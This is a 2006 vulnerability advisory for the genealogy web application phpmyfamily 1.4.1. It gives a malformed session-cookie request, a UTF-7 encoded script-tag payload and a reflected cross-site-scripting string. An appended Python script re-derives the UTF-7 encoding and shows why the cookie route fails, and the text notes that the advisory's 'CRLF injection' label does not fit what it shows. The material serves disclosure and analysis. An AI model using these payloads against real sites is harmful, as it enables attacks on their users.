phpmyfamily 1.4.1 CRLF injection & XSS

Credit: matrix_killer
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

------------------------------------------------------
HYSA-2006-007 Advisory 016
------------------------------------------------------

Date - Mon March 27 2006

TITLE:
======
phpmyfamily v1.4.1 CRLF injection & XSS

SEVERITY:
=========
Medium

SOFTWARE:
=========
phpmyfamily v1.4.1

INFO:
=====
phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central database of research which is readily accessible and editable.

DESCRIPTION:
============
--== CRLF Injection ==--

GET /phpmyfamily/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host:
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in on line 88

You can try to encode <script>alert('matrix_killer');</script> in UTF-7 like this:

+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer'); +ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-

This way you can bypass the protection, but I'm not sure that it will work. For me it didn't, but I'm still a beginner with CRLF attacks.

--== XSS ==--

'><script>alert ();</script>&email=1&action=sub&submit=Wy%B6lij

VENDOR STATUS:
==============
Vendor was contacted but no response has been received to date.

CREDITS:
========
This vulnerability was discovered and researched by matrix_killer of h4cky0u Security Forums.
mail : matrix_k at
web :

Co-Researcher: h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at
web :

Greets to all omega-team members + krassswr, EcLiPsE and all who support us !!!

ORIGINAL ADVISORY:
==================
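Two details of the description above are worth checking rather than taking on faith. First, the request shown contains no CR or LF bytes; what it demonstrates is PHP's session_start() rejecting a PHPSESSID cookie with characters outside its allowed set (a-z, A-Z, 0-9, '-' and ',') and emitting a warning (the file path in that warning is not reproduced on this page). Second, the UTF-7 form of the script tag is built by wrapping each character as a '+' base64(UTF-16BE) '-' shift sequence, and every such sequence contains a '+', which is not in PHP's allowed set, so the same check rejects it; that is consistent with the author's observation that the encoded form did not work. The following Python is an added example, not code from the advisory or from phpmyfamily; the regular expression is an assumed reconstruction of the check from the warning text, and the sample cookie value is the one shown in the request above.

```python
import base64
import re

# Reconstruction (assumption, from the warning text on the page) of the
# character set PHP's session_start() accepted for a session id.
PHP_SESSION_ID_RE = re.compile(r"^[A-Za-z0-9,-]+$")


def php_accepts_session_id(session_id: str) -> bool:
    """Mirror the check that produced the 'illegal characters' warning."""
    return bool(PHP_SESSION_ID_RE.match(session_id))


def utf7_shift(ch: str) -> str:
    """Encode one character as a stand-alone UTF-7 shift sequence.

    The sequence is '+', the base64 of the character's UTF-16BE bytes with
    '=' padding removed, then '-'.  '<' (U+003C, bytes 00 3C) becomes '+ADw-'.
    """
    b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
    return "+" + b64 + "-"


def utf7_wrap(tag: str, body: str) -> str:
    """Build <tag>body</tag> the way the advisory does: every character of the
    opening and closing tag is individually shifted, the '/' and the script
    body are left literal."""
    open_tag = "".join(utf7_shift(c) for c in "<" + tag + ">")
    close_tag = utf7_shift("<") + "/" + "".join(utf7_shift(c) for c in tag) + utf7_shift(">")
    return open_tag + body + close_tag


def utf7_decode(payload: str) -> str:
    """What a UTF-7-aware consumer would see for the encoded payload."""
    return payload.encode("ascii").decode("utf-7")


# Constructed inputs: the cookie value from the request on the page and the
# payload the advisory says it encoded.
BAD_COOKIE = "-4-2-=674sdasaf_"
PAYLOAD = utf7_wrap("script", "alert('matrix_killer');")


def summary() -> dict:
    """Collect the three checks a reader would want to see."""
    return {
        "cookie_accepted": php_accepts_session_id(BAD_COOKIE),
        "utf7_payload": PAYLOAD,
        "utf7_payload_accepted": php_accepts_session_id(PAYLOAD),
        "utf7_payload_decodes_to": utf7_decode(PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in summary().items():
        print(f"{key}: {value}")
```

Whitespace aside, the generated payload is character-for-character the string in the advisory; the decode step shows it does carry the original tag, and the session-id check shows why placing it in PHPSESSID cannot get past session_start().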
